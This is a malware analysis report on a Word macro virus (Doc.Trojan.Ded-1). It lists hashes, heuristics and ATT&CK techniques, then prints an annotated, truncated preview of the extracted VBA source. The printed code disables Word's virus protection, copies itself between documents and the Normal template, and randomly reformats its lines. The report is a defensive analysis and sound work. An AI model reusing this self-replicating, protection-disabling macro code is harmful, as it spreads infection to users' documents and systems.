Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 591a1cb706fea4cb…

MALICIOUS

Office (OLE)

35.0 KB Created: 2001-07-06 03:08:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: abb449dcaa342125a0e0c6de2a39a56a SHA-1: 1e2125c69390dc96bc146022b6086964da481989 SHA-256: 591a1cb706fea4cbb897d6948fe36917d0f6032be7afc233aaabb1150863b9c4
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro that uses the Shell() function to execute arbitrary code. This indicates an attempt to download and run a secondary payload. The extracted source preview additionally shows Document_Close, SWL and ABS99 routines that disable Options.VirusProtection and copy macro lines between the active document and the Normal template, which is consistent with self-replicating macro-virus behaviour. The ClamAV detection 'Doc.Trojan.Ded-1' further supports the malicious nature of the file.

Heuristics 5

  • ClamAV: Doc.Trojan.Ded-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ded-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22647 bytes
SHA-256: 080e7d9edb05481f344371e033b53d36d73c4f15c2f7122925200e0df1d07c92
Detection
ClamAV: Doc.Trojan.Ded-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Exported module attributes of the document's ThisDocument class module,
' the module in which the Word event handlers below (Document_Close, Document_New) live.
     ' Document_Close event handler: auto-executes when the document is closed.
     ' All runtime errors jump to the skam label, so failures are silently ignored.
     Private _
Sub Document_Close()

  On Error GoTo skam
'24,01388
          Options. _
VirusProtection = False
  ' Turns off Word's macro virus protection option before replicating.

              SWL
  ' SWL: copies macro lines from the Normal template into the active document (see Sub SWL).
'12,00358
       ABS99
  ' ABS99: copies macro lines from the active document into the Normal template (see Sub ABS99).
'4,611689
skam:
  ' Error-handler target: execution resumes here on any runtime error.
'57,84001
          End _
Sub

 ' Empty procedure. The name appears to be a mis-decoded non-ASCII identifier
 ' (looks like Cyrillic text read with the wrong code page) — cannot be confirmed from the extracted text.
 Private Sub _
Čäĺíňčôčęŕňîđ()

        End Sub
'19,21073
     ' Document_New event handler (runs when a new document is created from this template); body is empty.
     Private Sub Document_New()
'81,87105
 End Sub
'80,53137
       ' Same sequence as Document_Close: disable virus protection, then run the two
       ' replication routines. No caller of Claudio is visible in this preview.
       Sub Claudio()
'84,76658
       On Error _
GoTo skam
       ' Any runtime error jumps to skam, silently aborting the rest.

     Options. _
VirusProtection = False
     ' Turns off Word's macro virus protection option.

SWL
       ' Normal template -> active document (see Sub SWL).
'96,09924
         ABS99
       ' Active document -> Normal template (see Sub ABS99).
'38,10434
skam:
'60,13807
             End Sub
'95,08818
              ' SWL: copy the macro code from the Normal template into the active document.
              ' Hides the VBA editor, then, if the active document's first code module does
              ' not yet contain the text "Document_Close" (used as an "already present" marker),
              ' copies every non-blank, non-comment logical line of the Normal template's first
              ' code module into the active document. Physical lines ending in " _" are re-joined
              ' first; each logical line is passed through e() (only partially visible in this
              ' preview) before insertion, and the document is then saved.
              Private _
Sub SWL()

      Application. _
                                     ShowVisualBasicEditor = False
      ' Keep the VBA editor hidden while the code module is modified.

 If Not _
ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then
 ' Marker check: only proceed when the document's module does not already contain "Document_Close".

             For I = 1 To NormalTemplate. _
VBProject.VBComponents(1).CodeModule.CountOfLines

 d = NormalTemplate.VBProject. _
           VBComponents(1).CodeModule.Lines(I, 1)
 ' d = the I-th physical source line of the Normal template's first code module.

If _
Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then
' Skip empty lines, lone continuation markers and lines starting with ' (the random-number comments are not copied).

      While Mid(d, _
Len(d) - 1, 2) = " _"
      ' Line ends with a continuation marker: drop the trailing "_" and append the next physical line.

         I = I + 1
'53,45006
           d _
= Left(d, Len(d) - 1) & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

          Wend
'61,9153
            d _
= e(d)
            ' e() rewrites the joined logical line (see Function e below).

            ActiveDocument. _
             VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d
            ' Insert the rewritten line into the active document's first code module at line I * 2.

       End _
If

              Next I
'53,62399
   ActiveDocument. _
                                                SaveAs AddToRecentFiles:=False
   ' Persist the modified document without adding it to the recent-files list.

       End _
If

   End Sub
'61,97636
              ' ABS99: mirror of SWL — copy the macro code from the active document into the
              ' Normal template. If the template's first code module does not contain the text
              ' "Document_Close", calls f with the template's full path (f is not shown in this
              ' preview), copies every non-blank, non-comment logical line of the active document's
              ' first code module into the template via e(), and then saves the template.
              Private Sub _
ABS99()

              If _
Not NormalTemplate.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then
              ' Marker check: only proceed when the template's module does not already contain "Document_Close".

      f (NormalTemplate.FullName)
      ' f is defined outside the visible preview; what it does with the template path cannot be confirmed here.
'18,174
       For I = 1 To _
ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines

     d = _
ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
     ' d = the I-th physical source line of the active document's first code module.

          If Len(d) > 0 And _
Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then
          ' Skip empty lines, lone continuation markers and lines starting with '.

While Mid(d, Len(d) - 1, _
2) = " _"
' Line ends with a continuation marker: drop the trailing "_" and append the next physical line.

            I = _
I + 1

              d _
= Left(d, Len(d) - 1) & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

             Wend
'43,81393
        d _
= e(d)
        ' e() rewrites the joined logical line (see Function e below).

             NormalTemplate. _
               VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d
             ' Insert the rewritten line into the Normal template's first code module at line I * 2.

         End If
'26,32273
        Next I
'52,36308
         NormalTemplate. _
                       Save
         ' Persist the modified Normal template.

     End _
If

       End _
Sub

              Private _
Function e(aString) As String

     aString _
= LTrim(aString)

           aString = RTrim(aString)
'21,68937
   If aString = "Sub " & "Vc()" Then
'80,61559
       aString = "Sub " & "ViewVBCode()"
'99,9728
     Else
'66,88805
     If aString _
= "Sub " & "ViewVBCode()" Then

aString _
= "Sub " & "Vc()"

         End _
If

   End If
'37,50021
             For I = 1 _
To Len(aString) - 1

             If _
Mid(aString, I, 1) = "." Then

  If _
Not Mid(aString, I - 1, 1) = Chr$(34) And Not Mid(aString, I + 1, 1) = Chr$(34) And Int(3 * Rnd) = 1 Then

  If _
Not Mid(aString, I + 1, 1) = Chr$(34) Then

            e _
= Left(aString, I - 1) & ". _" & Chr$(13) & Right(aString, Len(aString) - I)

   For _
j = 1 To Int(15 * Rnd)

      e _
= " " & e

         Next _
j

Exit Function
'52,25902
End _
If

        End If
'90,59289
   Else
'97,62254
         If Mid(aString, I, 1) = " " And Int(3 _
* Rnd) = 1 And I > 1 Then

  If Not _
Mid(aString, I + 1, 1) = Chr$(34) And Not Mid(aString, I - 1, 1) = Chr$(34) Then

          e = _
Left(aString, I - 1) & " _" & Chr$(13) & Right(aString, Len(aString) - I)

         For j _
= 
... (truncated)